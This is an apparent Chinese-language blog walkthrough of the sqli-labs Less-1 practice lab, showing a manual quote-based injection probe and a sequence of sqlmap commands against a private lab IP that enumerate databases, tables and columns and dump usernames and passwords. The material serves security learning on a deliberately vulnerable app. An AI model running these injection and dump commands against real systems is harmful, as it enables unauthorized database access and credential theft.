網絡安全-sqlmap實戰之sqlilabs-Less1

目錄

類型

注入判斷

-u參數

 -dbs參數爆數據庫

 -tables參數爆表

-columns爆列

 -dump爆數據

查看源代碼

查看數據庫


類型

基於字符串的錯誤

注入判斷

?id=1'

 

存在sql注入

根據提示猜測,sql語句大概爲

select * from 表名 where id = 參數 LIMIT 0,1

-u參數

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-2/?id=1"
sql注入類型

 共發現4種注入類型

隨便測試了一種

 -dbs參數爆數據庫

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1" -dbs

 

數據庫

 -tables參數爆表

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-2/?id=1" -D security -tables

-columns爆列

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1" -D security -T users -columns

 -dump爆數據

選擇把三列數據都爆出來

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1" -D security -T users -C id,username,password -dump
爆數據

查看源代碼

sql語句爲

SELECT * FROM users WHERE id='$id' LIMIT 0,1

查看數據庫

users表

更多內容查看:網絡安全-自學筆記

有問題請下方評論,轉載請註明出處,並附有原文鏈接,謝謝!如有侵權,請及時聯繫。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章